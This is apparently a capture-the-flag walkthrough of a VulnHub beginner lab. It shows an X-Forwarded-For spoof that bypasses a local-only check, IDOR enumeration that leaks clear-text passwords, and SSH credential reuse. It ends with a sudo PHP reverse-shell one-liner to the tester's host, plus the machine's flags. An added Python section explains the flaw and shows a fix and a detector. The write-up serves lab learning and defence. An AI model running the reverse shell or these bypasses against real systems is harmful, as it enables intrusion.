Machine Link: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/#
Machine Author: TW1C3 (@makegreatagain_)
Description (as given by the machine author):
This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!
Level: Beginner
# of Flags: 2
Machine Published Date: 13-Dec-2019
The Solution:
It had been a while since I had got my hands dirty on any lab machines. While browsing vulnhub.com, I came across this interesting machine and thought of solving it. I took the following steps to capture both flags.
Since I knew the MAC address of the machine (00:0C:29:97:56:3F) and the IP range of the NAT interface (172.16.190.0/24), I ran the Nmap scan below to obtain the IP address of the machine and its open ports.
nmap -sS -p 21,22,23,80,443 172.16.190.0/24
From the Nmap output, it was clear that the IP address assigned to the virtual machine was 172.16.190.249 and that ports TCP/22 and TCP/80 were open. This suggests that the server was hosting a web application and that SSH was being used for remote administration of the machine.
Now I browsed the application in the browser and encountered an interesting message on the webpage: “Who are you? Hacker? Sorry This Site Can Only Be Accessed local!”
To dig further, I intercepted the request and response in Burp and found an HTML comment next to that line in the page source. The comment read: <!-- Maybe you can search how to use x-forwarded-for -->
So I started adding the header X-Forwarded-For: 127.0.0.1 to each of my requests, and the application started working. The application evidently decides whether a client is “local” from the value of this client-supplied header rather than from the address of the TCP peer, so anyone can claim to be local.
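To make the flaw behind this bypass concrete, here is an added example, written in Python rather than the machine's PHP and not code from the original post or from the VulnHub box: the locality check as the application seems to implement it, a hardened version that decides on the TCP peer address and honours X-Forwarded-For only from a trusted proxy, and a small log check that flags spoof attempts. The access-log format and the 10.0.0.2 proxy address in the samples are constructed.

```python
from ipaddress import ip_address

def _is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; False for anything unparseable."""
    try:
        return ip_address(addr).is_loopback
    except ValueError:
        return False

def is_local_request_vulnerable(remote_addr: str, headers: dict) -> bool:
    """Flawed check, the pattern the machine exhibits: the client-supplied
    X-Forwarded-For header overrides the real peer address, so anyone can
    claim to be local by sending X-Forwarded-For: 127.0.0.1."""
    claimed = headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()
    return _is_loopback(claimed)

def is_local_request_fixed(remote_addr: str, headers: dict,
                           trusted_proxies: frozenset = frozenset()) -> bool:
    """Hardened check: decide on the socket peer address (REMOTE_ADDR).
    X-Forwarded-For is consulted only when the peer is a proxy we operate,
    and then only its right-most entry, the one that proxy itself appended;
    everything to the left of it is attacker-controlled."""
    if remote_addr not in trusted_proxies:
        return _is_loopback(remote_addr)
    chain = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    return bool(chain[-1]) and _is_loopback(chain[-1])

def spoof_attempts(log_lines, trusted_proxies: frozenset = frozenset()):
    """Detection helper over constructed access-log lines of the form
    'peer_ip "xff_header"': return peers that are not trusted proxies yet
    present a loopback address in X-Forwarded-For."""
    hits = []
    for line in log_lines:
        peer, _, xff = line.partition(" ")
        first_hop = xff.strip('"').split(",")[0].strip()
        if peer not in trusted_proxies and _is_loopback(first_hop):
            hits.append(peer)
    return hits

if __name__ == "__main__":
    # Constructed request: peer 172.16.190.1 claims to be local via the header.
    hdrs = {"X-Forwarded-For": "127.0.0.1"}
    print(is_local_request_vulnerable("172.16.190.1", hdrs))  # True (bypassed)
    print(is_local_request_fixed("172.16.190.1", hdrs))       # False
    print(spoof_attempts(['172.16.190.1 "127.0.0.1"', '172.16.190.5 "-"']))
```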
Now we see a registration option on the application. This is the easiest way to gain access to the application. I registered myself to the application and proceeded for login.
After a successful login, there were 3 available options – Dashboard (the current page), Profile, and Logout. My next choice was the Profile section. On the profile page, the URL carried a parameter user_id with a value of 12. I sent the request to Intruder in Burp and passed sequential values from 1 to 15 as the payload, and observed that different values of user_id returned information about the other users, including their clear-text credentials: the profile endpoint never checks that the requested user_id belongs to the logged-in user (an insecure direct object reference).
Analyzing the responses in Intruder, I observed that user_id 5 corresponds to Alice’s profile. Alice’s credentials were username ‘alice’ and password ‘4lic3’.
Assuming Alice reuses the same credentials for all her logins, I tried my luck on the SSH port that was open on the server. The credentials worked, and I now had access to the server. Looking for Alice’s directories, especially the hidden ones, I ran the ls -a command. Another interesting find: a directory named ‘.my_secret’ was present in Alice’s home folder. Navigating to that directory and listing its files, I found two files – my_notes.txt and flag1.txt. Using the cat command, I read both files and found the first flag and a hint for the next one.
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Now, to gain root-level access, I first ran sudo su - as the basic option, but it didn’t work. Then I moved on to check what sudo permissions Alice has. I found that she has a NOPASSWD entry allowing her to run PHP files as the root user. A NOPASSWD rule for a scripting interpreter is effectively an unrestricted root grant, since the interpreter can spawn any process.
To exploit this misconfiguration, I started a Netcat listener on my system on port 1234 and ran the following command from Alice’s login. I got a root reverse shell on my Netcat listener.
sudo php -r '$sock=fsockopen("172.16.190.1", 1234); exec("/bin/sh -i <&3 >&3 2>&3");'
Navigating to the /root directory and listing all the files, I found only one file – flag2.txt. Using the cat command, I read flag2.txt and captured the second and final flag.
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
I hope you liked the blog and that it will be helpful when you solve this machine. A new learning for me on this machine was using PHP to get a reverse shell connection. I had learnt the technique earlier but never had a chance to use it.
Lastly, I would like to thank the author of this machine for the dedication and effort he put into creating it. Cheers TW1C3!!!